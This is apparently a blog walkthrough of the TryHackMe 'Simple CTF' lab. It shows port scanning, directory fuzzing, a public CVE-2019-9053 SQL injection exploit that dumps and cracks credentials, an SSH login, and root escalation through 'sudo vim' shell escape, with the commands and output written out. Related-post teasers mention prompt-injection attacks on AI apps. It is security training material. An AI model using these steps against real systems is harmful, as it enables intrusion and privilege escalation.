28 Nov 2025
TryHackMe Simple CTF
In this room, I discovered the box was susceptible to CVE-2019-9053. Exploiting this vulnerability allowed me to dump the database and crack the password for the user 'mitch'. After logging in via SSH, I enumerated the user's permissions and found 'mitch' could run vim as sudo. I utilized this GTFOBins technique to spawn a shell, successfully escalating privileges to root
Reconnaisance
Rustscan
┌──(hacker㉿hacker)-[/opt/ctf/simplectf]
└─$ sudo rustscan -a 10.82.160.156 -- -sCV -vv -oN nmap.txt
# Nmap 7.95 scan initiated Fri Nov 28 17:23:29 2025 as: /usr/lib/nmap/nmap -vvv -p 21,80,2222 -4 -sCV -vv -oN nmap.txt 10.82.160.156
Nmap scan report for 10.82.160.156
Host is up, received echo-reply ttl 62 (0.15s latency).
Scanned at 2025-11-28 17:23:43 IST for 38s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 62 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.134.75
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh syn-ack ttl 62 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCj5RwZ5K4QU12jUD81IxGPdEmWFigjRwFNM2pVBCiIPWiMb+R82pdw5dQPFY0JjjicSysFN3pl8ea2L8acocd/7zWke6ce50tpHaDs8OdBYLfpkh+OzAsDwVWSslgKQ7rbi/ck1FF1LIgY7UQdo5FWiTMap7vFnsT/WHL3HcG5Q+el4glnO4xfMMvbRar5WZd4N0ZmcwORyXrEKvulWTOBLcoMGui95Xy7XKCkvpS9RCpJgsuNZ/oau9cdRs0gDoDLTW4S7OI9Nl5obm433k+7YwFeoLnuZnCzegEhgq/bpMo+fXTb/4ILI5bJHJQItH2Ae26iMhJjlFsMqQw0FzLf
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6Q8K/lDR5QuGRzgfrQSDPYBEBcJ+/2YolisuiGuNIF+1FPOweJy9esTtstZkG3LPhwRDggCp4BP+Gmc92I3eY=
| 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2I73yryK/Q6UFyvBBMUJEfznlIdBXfnrEqQ3lWdymK
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 28 17:24:21 2025 -- 1 IP address (1 host up) scanned in 52.09 secondsHere we have three ports open:
Port 21 (FTP)
Port 80 (HTTP)
Port 2222 (SSH)
First i'll start with HTTP
Port 80
Website
Directory Fuzzing
┌──(hacker㉿hacker)-[/opt/ctf/simplectf]
└─$ gobuster dir -u http://10.82.160.156/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.82.160.156/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 297]
/.hta (Status: 403) [Size: 292]
/.htpasswd (Status: 403) [Size: 297]
/index.html (Status: 200) [Size: 11321]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 301]
/simple (Status: 301) [Size: 315] [--> http://10.82.160.156/simple/]
Progress: 4746 / 4746 (100.00%)
===============================================================
Finished
===============================================================So, In directory fuzzing i find a directory simple. Lets see that in browser
So, when I navigate in the footer of website i saw version of this cms is revealed
CVE-2019-9053
So, i immediately wen to google and find exploit for this version and got this
https://www.exploit-db.com/exploits/46635
but this is in python2 . So , I checked for python2 exploit and got this
https://github.com/so1icitx/CVE-2019-9053/tree/main
Shell as mitch
Exploit ran
┌──(hacker㉿hacker)-[/opt/ctf/simplectf/CVE-2019-9053]
└─$ python3 exploit.py --url http://10.82.160.156/simple/ -c -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
[...]
<!--[if IE 8]> <html lang='en' dir='ltr' class='lt-ie9'> <![endif]-->
<!--[i...
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret Found username and password
So, we found username and password
mitch:secretSSH as mitch
We can try to use these in ssh becaue we dont have login page in website
┌──(hacker㉿hacker)-[/opt/ctf/simplectf]
└─$ ssh mitch@10.82.160.156 -p 2222
The authenticity of host '[10.82.160.156]:2222 ([10.82.160.156]:2222)' can't be established.
ED25519 key fingerprint is: SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.82.160.156]:2222' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
mitch@10.82.160.156's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ pwd
/home/mitchUser Flag
$ ls
user.txt
$ cat user.txt
G00d j0b, keep up!Shell as Root
Run Vim as Root
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vimI know i can run vim as root so i immediately went to gtfobins to check exploit
$ sudo vim -c ':!/bin/sh'
# whoami
rootRoot Flag
# cd /root
# ls
root.txt
# cat root.txt
W3ll d0n3. You made it!YouTube Video
Similar Post
tryhackme 19 Nov 2025
TryHackMe Injectics Walkthrough: SQLi to SSTI RCE
Bypass client-side SQL filters using Burp Suite and drop tables for Admin access. Learn to escalate from SQLi to SSTI and RCE in this CTF walkthrough.
tryhackme 29 Nov 2025
TryHackMe Evil-GPT
Dive into the mechanics of LLM abuse with this Evil-GPT walkthrough. Learn how prompt injection vulnerabilities exploit AI-driven systems, understand the risks, and discover essential defensive strategies to secure your own applications against unauthorized access and privilege escalation.
tryhackme 29 Nov 2025
TryHackMe HealthGPT
Master the mechanics of LLM prompt injection vulnerabilities using a HealthGPT walkthrough. Understand the risks of unauthorized access and privilege escalation in AI systems
tryhackme 25 Nov 2025
TryHackMe HeartBleed
Learn to detect and exploit the Heartbleed vulnerability (CVE-2014-0160) in this hands-on TryHackMe room. Master OpenSSL security and ethical hacking techniques today
